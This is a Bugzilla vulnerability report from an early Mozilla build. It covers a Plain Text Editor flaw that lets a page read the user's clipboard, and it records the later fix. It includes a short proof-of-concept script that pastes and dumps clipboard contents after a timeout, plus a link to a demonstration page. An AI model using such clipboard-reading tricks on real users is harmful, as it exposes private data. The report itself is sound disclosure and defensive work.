Closed
Bug 12190
Opened 26 years ago
Closed 26 years ago
Plain Text Editor allows reading clipboard
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M13
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
There is a security vulnerability in Mozilla 5.0 M8 (later builds are also
affected)
which allows stealing user's clipboard.
In downloaded TextEditorAppShell2.xul is added:
<html:script>
function DumpClip()
{
EditorPaste();
EditorSelectAll();
dump("-----Begin Clipboard\n");
dump(editorShell.editorSelection.getRangeAt(0).toString());
dump("\n-----End Clipboard\n");
}
setTimeout("DumpClip()",5000);
</html:script>
Demonstration is available at:
http://www.nat.bg/~joro/mozilla/editor/editor2.html
| Assignee | ||
Updated•26 years ago
|
Status: NEW → ASSIGNED
Target Milestone: M11
| Assignee | ||
Updated•26 years ago
|
| Assignee | ||
Comment 1•26 years ago
|
||
Move security bugs from M11 to M13; needed for beta but not for dogfood.
| Assignee | ||
Updated•26 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
| Assignee | ||
Comment 2•26 years ago
|
||
XPAppCoresManager finally died, closing this security hole.
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
| Comment hidden (collapsed) |
You need to log in
before you can comment on or make changes to this bug.
Description
•